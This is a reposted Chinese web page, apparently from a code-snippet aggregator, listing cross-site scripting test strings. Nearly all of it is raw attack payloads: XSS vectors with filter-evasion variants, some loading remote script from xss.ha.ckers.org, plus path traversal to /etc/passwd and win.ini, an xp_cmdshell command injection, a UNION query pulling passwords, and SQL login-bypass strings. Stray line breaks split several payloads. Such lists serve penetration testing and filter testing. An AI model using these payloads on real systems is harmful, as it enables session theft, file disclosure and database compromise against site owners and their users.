脚本宝典收集整理的这篇文章主要介绍了XSS测试语句大全,脚本宝典觉得挺不错的,现在分享给大家,也给大家做个参考。
'><script>alert(document.cookie)</script>
='><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
%3Cscript%3Ealert('XSS')%3C/script%3E
<s&
amp;#99;ript>alert('XSS')</script>
<
img src="javascript:alert('XSS')">
%0a%0a<script>alert(\"Vulnerable\")</script>.jsp
%22%3cscript%3ealert(%22xss%22)%3c/script%3e
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/
passwd %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3c/t
ITle%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3cscript%3ealert(%22xss%22)%3c/script%3e/index.ht
ML %3f.jsp
%3f.jsp
<script>alert('Vulnerable');</script>
<script>alert('Vulnerable')</script>
?
SQL_debug=1
a%5c.aspx
a.jsp/<script>alert('Vulnerable')</script>
a/
a?<script>alert('Vulnerable')</script>
"><script>alert('Vulnerable')</script>
';exec%20master
..xp_cmdshell%20'dir%20 c:%20>%20c:\
inetp
ub\wwwroot\?.txt'--
&& %22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
%3Cscript%3Ealert(document. dom
ain);%3C/script%3E&
%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=
1%20union%20all%20select%20pass,0,0,0,0%20
From%20customers%20where%20fname=
../../../../../../../../etc/passwd
..\..\..\..\..\..\..\..\windows\
System.ini
\..\..\..\..\..\..\..\..\windows\system.ini
'';!--"<XSS>=&{()}
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert("XSS")>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
"<IMG SRC=java\0script:alert(\"XSS\")>";' > out
<IMG SRC=" javascript:alert('XSS');">
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
<BODY BACKGROUND="javascript:alert('XSS')">
<BODY ONLOAD=alert('XSS')>
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<BGSOUND SRC="javascript:alert('XSS');">
<
br size="&{alert('XSS')}">
<LAYER SRC="
http://xss.ha.ckers.org/a.js"></layer>
<LINK REL="stylesheet"
hrEF="javascript:alert('XSS');">
<IMG SRC='
vbscript:msgbox("XSS")'>
<IMG SRC="mocha:[code]">
<IMG SRC="livescript:[code]">
<
;mETA HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<IFRAME SRC=javascript:alert('XSS')></IFRAME>
<FRAMESET><FRAME SRC=javascript:alert('XSS')></FRAME></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background
-image: url(javascript:alert('XSS'))">
<DIV STYLE="behaviour: url('
http://www.how-to-hack.org/exploit.html');">
<DIV STYLE="width: ex
Pression(alert('XSS'));">
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE='xss:ex
PRe\ssion(alert("XSS"))'>
<STYLE TY
PE="text/javascript">alert('XSS');</STYLE>
<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<BASE HREF="javascript:alert('XSS');//">
getURL("javascript:alert('XSS')")
a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);
<
XML SRC="javascript:alert('XSS');">
"> <BODY ONLOAD="a();"><SCRIPT>function a(){alert('XSS');}</SCRIPT><"
<SCRIPT SRC="
http://xss.ha.ckers.org/xss.jpg"></SCRIPT>
<IMG SRC="javascript:alert('XSS')"
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://xss.ha.ckers.
org/a.js></SCRIPT>'"-->
<IMG SRC="
http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
<SCRIPT a=">" SRC="
http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT =">" SRC="
http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT a=">" '' SRC="
http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT "a='>'" SRC="
http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="
http://xss.ha.ckers.org/a.js"></SCRIPT>
<A HREF=http://www.go
http://www.google.com/ogle.com/>link</A>
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
脚本宝典总结
以上是脚本宝典为你收集整理的XSS测试语句大全全部内容,希望文章能够帮你解决XSS测试语句大全所遇到的问题。
如果觉得脚本宝典网站内容还不错,欢迎将脚本宝典推荐好友。
本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
如您有任何意见或建议可联系处理。小编QQ:384754419,请注明来意。